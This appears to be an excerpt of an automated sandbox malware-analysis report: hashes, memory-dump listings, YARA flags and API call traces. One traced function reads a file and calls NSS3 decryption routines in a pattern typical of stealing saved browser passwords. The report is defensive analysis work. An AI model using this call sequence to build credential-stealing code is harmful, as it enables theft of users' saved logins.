                                                                                                        • Instruction ID: 762a1eb15310ecf74f3cef1a83b3ef3bbc135736daedf57ee5115a64501100dd
                                                                                                        • Opcode Fuzzy Hash: 63323ee303d310e3bf9fc7729428787ce618392a0717bc4cb55730e8021873ff
                                                                                                        • Instruction Fuzzy Hash: AF11917570634A9FDB00DF19C8806AA77A5FF85368F14806DEC198B751DB71E80ACBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                        • Instruction ID: e15bc2c86733291f2fa027b215a320bee53279282b8da9cfeaeb7d09ecc5f63c
                                                                                                        • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                        • Instruction Fuzzy Hash: 2EE06D3EA03059A7DB148E09C450AA97399DF8561AFA4C479DC599BA41D633F8078781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                        • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                                                                        • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                        • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                        • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                        • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                        • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                        • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                        • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                        • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                        • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                        • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                        • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                        • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                        • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                        • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0040DBBB
                                                                                                          • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 0040DD04
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DD27
                                                                                                        • strcpy_s.MSVCRT ref: 0040DD43
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DD62
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DD9A
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DDC4
                                                                                                        • strcpy_s.MSVCRT ref: 0040DDDA
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DDF3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE18
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DE26
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE42
                                                                                                        • strcpy_s.MSVCRT ref: 0040DE52
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE6B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE9A
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DECA
                                                                                                        • strcpy_s.MSVCRT ref: 0040DEDD
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DEF6
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040DEFF
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040DF34
                                                                                                          • Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                                                                        • strcpy_s.MSVCRT ref: 0040DF75
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DFA8
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040DFAD
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DFDE
                                                                                                        • strcpy_s.MSVCRT ref: 0040DFEC
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E000
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E03C
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040E04A
                                                                                                        • strcpy_s.MSVCRT ref: 0040E065
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E07E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E129
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E17A
                                                                                                          • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
                                                                                                          • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
                                                                                                          • Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
                                                                                                          • Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
                                                                                                          • Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 838878465-0
                                                                                                        • Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
                                                                                                        • Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
                                                                                                        • Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
                                                                                                        • Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54
                                                                                                        APIs
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C0A582D), ref: 6C0DCC27
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C0A582D), ref: 6C0DCC3D
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C10FE98,?,?,?,?,?,6C0A582D), ref: 6C0DCC56
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCC6C
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCC82
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCC98
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0A582D), ref: 6C0DCCAE
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C0DCCC4
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C0DCCDA
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C0DCCEC
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C0DCCFE
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C0DCD14
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C0DCD82
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C0DCD98
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C0DCDAE
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C0DCDC4
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C0DCDDA
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C0DCDF0
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C0DCE06
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C0DCE1C
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C0DCE32
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C0DCE48
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C0DCE5E
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C0DCE74
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C0DCE8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strcmp
                                                                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                        • API String ID: 1004003707-2809817890
                                                                                                        • Opcode ID: 01ec046a675025959ccd4ebea63c1c0642dcbfc2fb22de8711c9917a1e933573
                                                                                                        • Instruction ID: 295ab8c0cc78028df7263a9135f1999eb88e64030e373c73085acf3fa6955742
                                                                                                        • Opcode Fuzzy Hash: 01ec046a675025959ccd4ebea63c1c0642dcbfc2fb22de8711c9917a1e933573
                                                                                                        • Instruction Fuzzy Hash: CB51B9E1B5532522FE0034155D25BAE66C5EB1324EF61803EFD19A5FC0FF14B6098ABB
                                                                                                        APIs
                                                                                                        • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004373A4,0043680F), ref: 0040A9C1
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
                                                                                                        • StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
                                                                                                        • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
                                                                                                        • lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
                                                                                                        • lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
                                                                                                        • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
                                                                                                        • lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
                                                                                                        • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA
                                                                                                          • Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
                                                                                                          • Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
                                                                                                          • Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
                                                                                                          • Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
                                                                                                          • Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
                                                                                                          • Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
                                                                                                          • Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
                                                                                                          • Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
                                                                                                        • lstrcatA.KERNEL32(00000000,004373B4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
                                                                                                        • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28
                                                                                                          • Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
                                                                                                          • Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB
                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
                                                                                                        • lstrcatA.KERNEL32(00000000,004373B8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
                                                                                                        • lstrcatA.KERNEL32(00000000,004373BC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
